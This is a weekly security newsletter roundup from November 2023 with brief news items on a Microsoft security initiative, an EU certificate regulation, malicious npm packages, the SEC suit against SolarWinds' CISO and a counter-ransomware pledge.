11/3/23: SolarWinds, Microsoft, npm, ransoms & more!

Here are this week's security highlights:

Microsoft vows to revamp the way it provides cybersecurity protection

In a blog post, three Microsoft executives said they “have put significant thought into how we should anticipate and adapt to the increasingly more sophisticated cyber threats.” The result is a commitment to three areas of engineering advancement: “transforming” software development, implementing new identity protections and driving faster vulnerability response. “In recent months, we’ve concluded within Microsoft that the increasing speed, scale, and sophistication of cyberattacks call for a new response,” President Brad Smith wrote in a separate posting. “This new initiative will bring together every part of Microsoft to advance cybersecurity protection.”

Proposed legal reform could fundamentally undermine security online in EU

More than 300 of the world’s most respected cybersecurity experts have written to European Union lawmakers to warn that a proposed legal reform that may soon become law could fundamentally undermine security online. A similar joint letter has been sent by industry organizations — including The Linux Foundation , Cloudflare , and Mozilla — telling the EU lawmakers that the proposed regulations are a “dangerous intervention” that risk breaking the fragile system of trust that underpins the use of cryptographic certificates on the web.

48 malicious npm packages found

A new set of 48 malicious npm, Inc. packages have been discovered in the npm repository with capabilities to deploy a reverse shell on compromised systems. "These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate a reverse shell on package install," software supply chain security firm Phylum said. All the counterfeit packages have been published by an npm user named hktalent (GitHub, X). As of writing, 39 of the packages uploaded by the author are still available for download.

SEC lawsuit against SolarWinds CISO scares cybersecurity leaders

In a development sparking chatter and debate through the cybersecurity world, the lawsuit filed by the U.S. Securities and Exchange Commission (SEC) against the Chief Information Security Officer (CISO) of SolarWinds is leaving CISOs across the industry spooked and reevaluating their roles. The SEC’s lawsuit is a rare instance of a regulatory body targeting a CISO for alleged mismanagement of cybersecurity risks. The suit claims that the former CISO was aware of the vulnerabilities in SolarWinds’ systems but did not disclose them adequately to the company’s investors, leading to misleading statements in SolarWinds’ filings with the SEC.

Ransomware ransoms may not work in some countries

The United States and a consortium of some four dozen countries will pledge this week to no longer pay ransoms demanded as part of ransomware attacks, a senior administration official said. The statement will come as part of a meeting of the International Counter Ransomware Initiative set to take place. The commitment to no longer pay ransoms will be part of a joint policy statement signed by 48 countries, the European Union , and INTERPOL . This year’s meeting of the ransomware initiative will focus on information sharing around incorporating artificial intelligence and blockchain analysis into the ransomware fight, a new information-sharing platform for member countries, and, in the spirit of fighting back, the first-ever policy statement declaring that member nations will not pay ransoms.

Going to #KubeCon in Chicago? Register to join a day of security, soiree, PartyCon, Kuberoke or all!

Don't forget to subscribe for weekly security updates.